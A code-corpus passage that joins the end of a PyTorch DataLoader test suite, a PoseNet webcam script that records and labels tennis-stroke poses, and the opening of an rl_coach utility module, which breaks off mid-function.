fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_kill':
if isinstance(loader_p.exception, RuntimeError):
if 'DataLoader worker (pid' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif isinstance(loader_p.exception, ConnectionRefusedError):
# Sometimes, when the worker is being killed and is freeing its
# resources, the unpickling in loader process will be met an
# a `ConnectionRefusedError` as it can not open a socket to receive
# resource. In such cases, the worker may not have fully exited,
# and the loader can't know this via `is_alive` check or `SIGCHLD`
# handler. So we permit this as an allowed error as well.
# After all, we are happy as long as it terminates.
pass
else:
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Worker error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
finally:
loader_p.terminate()
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for _ in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
class IterableDataset(torch.utils.data.IterableDataset):
def __len__(self):
return 10
def __iter__(self):
return iter(range(10))
iterable_loader = DataLoader(IterableDataset(), batch_size=1)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=1, drop_last=True)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=2)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=2, drop_last=True)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=3)
self.assertEqual(len(iterable_loader), 4)
iterable_loader = DataLoader(IterableDataset(), batch_size=3, drop_last=True)
self.assertEqual(len(iterable_loader), 3)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = self._get_data_loader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
def test_default_convert_mapping_keep_type(self):
data = CustomDict({"a": 1, "b": 2})
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_keep_type(self):
data = CustomList([1, 2, 3])
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_dont_keep_type(self):
data = range(2)
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, [0, 1])
def test_default_collate_dtype(self):
arr = [1, 2, -1]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.int64)
arr = [1.1, 2.3, -0.9]
collated = _utils.collate.default_collate(arr)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.float64)
arr = [True, False]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.bool)
# Should be a no-op
arr = ['a', 'b', 'c']
self.assertEqual(arr, _utils.collate.default_collate(arr))
def test_default_collate_mapping_keep_type(self):
batch = [CustomDict({"a": 1, "b": 2}), CustomDict({"a": 3, "b": 4})]
collated = _utils.collate.default_collate(batch)
expected = CustomDict({"a": torch.tensor([1, 3]), "b": torch.tensor([2, 4])})
self.assertEqual(collated, expected)
def test_default_collate_sequence_keep_type(self):
batch = [CustomList([1, 2, 3]), CustomList([4, 5, 6])]
collated = _utils.collate.default_collate(batch)
expected = CustomList([
torch.tensor([1, 4]),
torch.tensor([2, 5]),
torch.tensor([3, 6]),
])
self.assertEqual(collated, expected)
def test_default_collate_sequence_dont_keep_type(self):
batch = [range(2), range(2)]
collated = _utils.collate.default_collate(batch)
self.assertEqual(collated, [torch.tensor([0, 0]), torch.tensor([1, 1])])
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
self.assertEqual(arr, _utils.collate.default_collate(arr))
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
import numpy as np
with tempfile.TemporaryFile() as f:
arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
arr_memmap = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
arr_memmap[:] = arr[:]
arr_new = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
tensor = _utils.collate.default_collate(list(arr_new))
self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
batch = [['X'], ['X', 'X']]
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch))
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch[::-1]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
import numpy as np
t_in = torch.zeros(1)
n_in = np.zeros(1)
self.assertEqual(t_in.is_shared(), False)
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)
# FIXME: fix the following hack that makes `default_collate` believe
# that it is in a worker process (since it tests
# `get_worker_info() != None`), even though it is not.
old = _utils.worker._worker_info
try:
_utils.worker._worker_info = 'x'
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
finally:
_utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
with self.assertWarnsRegex(
UserWarning,
r"excessive worker creation might get DataLoader running slow or even freeze"):
dataloader = DataLoader(self.dataset, batch_size=2, num_workers=1000)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2(TestCase):
@skipIfNoDill
def test_basics(self):
# TODO(VitalyFedyunin): This test will start breaking if we remove guaranteed order
# of traversing workers
dp = IterableWrapper(list(range(1000)))
dl = DataLoader(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2 = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2_threading = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2, parallelism_mode='thread')
self.assertEqual(list(dl), list(dl2))
self.assertEqual(list(dl), list(dl2_threading))
class Sorter(IterDataPipe):
def __init__(self, datapipe):
self.datapipe = datapipe
def __iter__(self):
return iter(sorted(self.datapipe))
def test_shuffle(self):
items = list(range(1000))
dp = IterableWrapper(items).sharding_filter().shuffle()
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=False)
self.assertEqual(items, list(dl))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=False,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertEqual(items, list(dl))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=True)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=True,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
dl = DataLoader2(self.Sorter(dp), batch_size=None, num_workers=2, shuffle=True)
self.assertEqual(list(dl), items)
dl = DataLoader2(self.Sorter(dp), batch_size=None, num_workers=2, shuffle=True,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertEqual(list(dl), items)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2_EventLoop(TestCase):
@skipIfNoDill
def test_basic_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
it = list(range(100))
numbers_dp = IterableWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(numbers_dp)
process.start()
local_datapipe = communication.iter.QueueWrapper(
communication.protocol.IterDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
clean_me(process, req_queue, res_queue)
self.assertEqual(list(range(100)), actual)
@skipIfNoDill
def test_basic_mapdatapipe_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
input_len = 100
it = list(range(input_len))
numbers_dp = SequenceWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(
numbers_dp)
process.start()
# Functional Test: Ensure that you can retrieve every element from the Queue and DataPipe
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
self.assertEqual([(x, x) for x in range(100)], actual)
# Functional Test: raise Error when input
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
with self.assertRaisesRegex(IndexError, "out of bound"):
local_datapipe[1000]
# __len__ Test: Ensure that the correct length is returned
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
self.assertEqual(input_len, len(local_datapipe))
clean_me(process, req_queue, res_queue)
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
def setUp(self):
super(TestStringDataLoader, self).setUp()
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for (s, n) in loader:
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.empty(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
def setUp(self):
super(TestDictDataLoader, self).setUp()
self.dataset = DictDataset()
def test_sequential_batch(self):
for persistent_workers in (False, True):
if persistent_workers:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers, num_workers=1)
else:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory_device(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True, pin_memory_device='cuda')
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned(device='cuda'))
self.assertTrue(sample['another_dict']['a_number'].is_pinned(device='cuda'))
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory_with_only_device(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory_device='cuda')
for sample in loader:
self.assertFalse(sample['a_tensor'].is_pinned(device='cuda'))
self.assertFalse(sample['another_dict']['a_number'].is_pinned(device='cuda'))
class DummyDataset(torch.utils.data.Dataset):
def __init__(self):
self.data = list(range(10))
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# The persistent workers always maintain the original
# dataset through the dataloader lifetime
# so the attributes will remain the same as the
# first time the workers where spawned (dataloader iteration)
assert self.start == 0
return self.data[idx]
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN, "DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoaderPersistentWorkers(TestDataLoader):
def setUp(self):
super(TestDataLoaderPersistentWorkers, self).setUp()
self.persistent_workers = True
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1, persistent_workers=True):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_dataset_not_reset(self):
dataset = DummyDataset()
pin_memory_configs = [False]
if TEST_CUDA:
pin_memory_configs.append(True)
for pin_memory in pin_memory_configs:
dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
dataset.start = 0
for i in range(10):
for x in dataloader:
pass
# Changing the start value here doesn't have any effect in the dataset
# cached by the workers. since they are not recreated between epochs
# and can cache values safely
dataset.start = i
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_early_exit(self):
import subprocess
proc = subprocess.check_output([sys.executable, '-c', """\
import torch
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
if __name__ == '__main__':
dl = DataLoader(
RandomDataset(64, (28, 28)),
batch_size=16,
num_workers=2,
pin_memory=True,
persistent_workers=True,
multiprocessing_context="fork",
)
for _ in dl:
break
"""])
class NamedTupleDataset(Dataset):
from collections import namedtuple
Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
Data = namedtuple('Data', ['positive', 'negative'])
def __len__(self):
return 4
def __getitem__(self, ndx):
return self.Batch(data=self.Data(positive=ndx, negative=-ndx),
label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
def setUp(self):
super(TestNamedTupleDataLoader, self).setUp()
self.dataset = NamedTupleDataset()
def test_dataloader_with_namedtuple(self):
# auto-collation
loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertIsInstance(batch.data.positive, torch.Tensor)
self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
# no auto-collation
loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertNotIsInstance(batch.data.positive, torch.Tensor)
class SimpleCustomBatch(object):
def __init__(self, data):
transposed_data = list(zip(*data))
self.inp = torch.stack(transposed_data[0], 0)
self.tgt = torch.stack(transposed_data[1], 0)
def pin_memory(self):
self.inp = self.inp.pin_memory()
self.tgt = self.tgt.pin_memory()
return self
def is_pinned(self):
return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` can not be correctly unpickled from spawned module
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
data = torch.stack([sample[0] for sample in batch], 1)
t, b = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
data = torch.stack([sample[0] for sample in batch], 0)
b, t = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
def setUp(self):
super(TestCustomPinFn, self).setUp()
inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
self.dataset = TensorDataset(inps, tgts)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin_worker(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True, num_workers=1)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"Flaky with ASAN, see https://github.com/pytorch/pytorch/issues/65727")
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
super(TestIndividualWorkerQueue, self).setUp()
self.dataset = TestWorkerQueueDataset(list(range(128)))
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
timeout=5, worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
def test_ind_worker_queue(self):
max_num_workers = None
if hasattr(os, 'sched_getaffinity'):
try:
max_num_workers = len(os.sched_getaffinity(0))
except Exception:
pass
if max_num_workers is None:
cpu_count = os.cpu_count()
if cpu_count is not None:
# Use half number of CPUs
max_num_workers = cpu_count // 2
if max_num_workers is None:
max_num_workers = 1
for batch_size in (8, 16, 32, 64):
for num_workers in range(0, min(6, max_num_workers)):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers + 1)
class SetAffinityDataset(IterableDataset):
def __iter__(self):
torch.randperm(1)
after = os.sched_getaffinity(0)
return iter(after)
def worker_set_affinity(_):
os.sched_setaffinity(0, [multiprocessing.cpu_count() - 1])
@unittest.skipIf(
not hasattr(os, 'sched_setaffinity'),
"os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
def test_set_affinity_in_worker_init(self):
dataset = SetAffinityDataset()
dataloader = torch.utils.data.DataLoader(
dataset, num_workers=2, worker_init_fn=worker_set_affinity)
for sample in dataloader:
self.assertEqual(sample, [multiprocessing.cpu_count() - 1])
class ConvDataset(Dataset):
def __init__(self):
self.x = torch.ones(1, 1, 24000)
# Call convolution on parent process
self[0]
def __len__(self):
return 1
def __getitem__(self, index):
return torch.nn.functional.conv1d(self.x, torch.ones(1, 1, 2))
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
# Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
def test_conv_after_fork(self):
loader = DataLoader(ConvDataset(), num_workers=1)
for x in loader:
self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
run_tests()
|
webcam_demo.py | import tensorflow as tf
import json
import math
import cv2
import time
import argparse
import concurrent.futures
import posenet
import keyboard
import sys
import numpy as np
from threading import Thread
from slugify import slugify
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=int, default=101)
parser.add_argument('--cam_id', type=int, default=0)
parser.add_argument('--cam_width', type=int, default=1280)
parser.add_argument('--cam_height', type=int, default=720)
parser.add_argument('--scale_factor', type=float, default=0.7125)
parser.add_argument('--file', type=str, default=None, help="Optionally use a video file instead of a live camera")
args = parser.parse_args()
def main():
# tf.config.threading.set_inter_op_parallelism_threads(0)
# tf.config.threading.set_intra_op_parallelism_threads(0)
# print(tf.config.threading.get_inter_op_parallelism_threads())
# print(tf.config.threading.get_intra_op_parallelism_threads())
with tf.compat.v1.Session() as sess:
model_cfg, model_outputs = posenet.load_model(args.model, sess)
output_stride = model_cfg['output_stride']
if args.file is not None:
cap = cv2.VideoCapture(args.file)
else:
cap = cv2.VideoCapture(args.cam_id)
cap.set(3, args.cam_width)
cap.set(4, args.cam_height)
start = time.time()
frame_count = 0
recording = True
# ret,frame1 = cap.read()
# ret,frame2 = cap.read()
file_content = []
while True:
# diff = cv2.absdiff(frame1,frame2)
# gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
# blur = cv2.GaussianBlur(gray,(15,15),0)
# _, thresh = cv2.threshold(blur,20,255,cv2.THRESH_BINARY)
# dilated = cv2.dilate(thresh,None, iterations=3)
# contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# # if(len(contours)>0):
# # print("One:")
# # print(dir(contours[0]))
# # print("One it is.")
# for contour in contours:
# (x,y,w,h) = cv2.boundingRect(contour)
# if(cv2.contourArea(contour)>400):
# continue
# cv2.rectangle(frame1,(x,y),(x+w,y+h),(0,255,0),2)
# # cv2.drawContours(frame1,contours, -1,(0,255,0),2)
# cv2.imshow("feed",frame1)
# frame1 = frame2
# ret, frame2 = cap.read()
input_image, display_image, output_scale = posenet.read_cap(cap, scale_factor=args.scale_factor, output_stride=output_stride)
heatmaps_result, offsets_result, displacement_fwd_result, displacement_bwd_result = sess.run(
model_outputs,
feed_dict={'image:0': input_image}
)
pose_scores, keypoint_scores, keypoint_coords = posenet.decode_multi.decode_multiple_poses(
heatmaps_result.squeeze(axis=0),
offsets_result.squeeze(axis=0),
displacement_fwd_result.squeeze(axis=0),
displacement_bwd_result.squeeze(axis=0),
output_stride=output_stride,
max_pose_detections=1,
min_pose_score=0.15)
keypoint_coords *= output_scale
# TODO this isn't particularly fast, use GL for drawing and display someday...
# print("\n ===================================== \n")
img = posenet.draw_skel_and_kp(
display_image, pose_scores, keypoint_scores, keypoint_coords,
min_pose_score=0.15, min_part_score=0.15)
cv2.imshow('posenet', img)
frame_count += 1
if(recording):
normalize_poses(keypoint_coords)
results = json.dumps({
"timestamp":time.time() - start,
"pose_scores":pose_scores.tolist(),
"keypoint_scores":keypoint_scores.tolist(),
"scores": keypoint_scores.size,
"keypoint_coords":normalize_poses(keypoint_coords),
"coords": keypoint_coords.size
})
file_content.append(results)
file_content = file_content[-30:]
if cv2.waitKey(1) & keyboard.is_pressed('w'):
print('you pressed w - service it was!')
time.sleep(0.5)
path = "collected/serves/"
filename = str(slugify("s-"+str(time.time()))+".txt")
x = Thread(target=save_to_file, args=(str(path+filename),str(file_content)))
x.start()
x.join()
file_content = []
if cv2.waitKey(1) & keyboard.is_pressed('d'):
print('you pressed d - forehand it was!')
time.sleep(0.5)
path = "collected/forehand/"
filename = str(slugify("f-"+str(time.time()))+".txt")
x = Thread(target=save_to_file, args=(str(path+filename),str(file_content)))
x.start()
x.join()
file_content = []
if cv2.waitKey(1) & keyboard.is_pressed('a'):
print('you pressed a - backhand it was!')
time.sleep(0.5)
path = "collected/backhand/"
filename = str(slugify("b-"+str(time.time()))+".txt")
x = Thread(target=save_to_file, args=(str(path+filename),str(file_content)))
x.start()
x.join()
file_content = []
if cv2.waitKey(1) & keyboard.is_pressed('q'):
print('you pressed q - quitting!')
cv2.destroyAllWindows()
break
print('Average FPS: ', frame_count / (time.time() - start))
return 0
def my_function(toPrint):
print(toPrint)
def save_to_file(filename,data):
file = open(filename,'w')
file.write(data)
file.close()
def find_middle(left,right):
x = (left[0]+right[0])/2.0
y = (left[1]+right[1])/2.0
return [x,y]
def find_distance(pointA,pointB):
dist = math.sqrt((pointB[0] - pointA[0])**2 + (pointB[1] - pointA[1])**2)
return dist
def normalize_poses(poses):
leftShoulderCords = poses[0][5]
rightShoulderCords = poses[0][6]
middleShoulderPoint = find_middle(leftShoulderCords,rightShoulderCords)
leftHipCords = poses[0][11]
rightHipCords = poses[0][12]
middleHipPoint = find_middle(leftHipCords,rightHipCords)
armHipDistance = find_distance(middleHipPoint,middleShoulderPoint);
normalized = []
for pose in poses[0]:
normalized.append(
[(pose[0]-middleHipPoint[0])/armHipDistance,
(pose[1]-middleHipPoint[1])/armHipDistance]
)
return normalized
if __name__ == "__main__":
main() |
utils.py | #
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import importlib
import importlib.util
import inspect
import os
import re
import signal
import sys
import threading
import time
import traceback
from multiprocessing import Manager
from subprocess import Popen
from typing import List, Tuple, Union
import atexit
import numpy as np
from rl_coach.logger import screen
killed_processes = []
eps = np.finfo(np.float32).eps
def lower_under_to_upper(s):
s = s.replace('_', ' ')
s = s.title()
return s.replace(' ', '')
def get_base_dir():
return os.path.dirname(os.path.realpath(__file__))
def list_all_presets():
presets_path = os.path.join(get_base_dir(), 'presets')
return [f.split('.')[0] for f in os.listdir(presets_path) if f.endswith('.py') and f != '__init__.py']
def list_all_classes_in_module(module):
return [k for k, v in inspect.getmembers(module, inspect.isclass) if v.__module__ == module.__name__]
def parse_bool(value):
return {'true': True, 'false': False}.get(value.strip().lower(), value)
def convert_to_ascii(data):
import collections
if isinstance(data, basestring):
return parse_bool(str(data))
elif isinstance(data, collections.Mapping):
return dict(map(convert_to_ascii, data.iteritems()))
elif isinstance(data, collections.Iterable):
return type(data)(map(convert_to_ascii, data))
else:
return data
def break_file_path(path):
base = os.path.splitext(os.path.basename(path))[0]
extension = os.path.splitext(os.path.basename(path))[1]
dir = os.path.dirname(path)
return dir, base, extension
def is_empty(str):
return str == 0 or len(str.replace("'", "").replace("\"", "")) == 0
def path_is_valid_dir(path):
return os.path.isdir(path)
def remove_suffix(name, suffix_start):
for s in suffix_start:
split = name.find(s)
if split != -1:
name = name[:split]
return name
def parse_int(value):
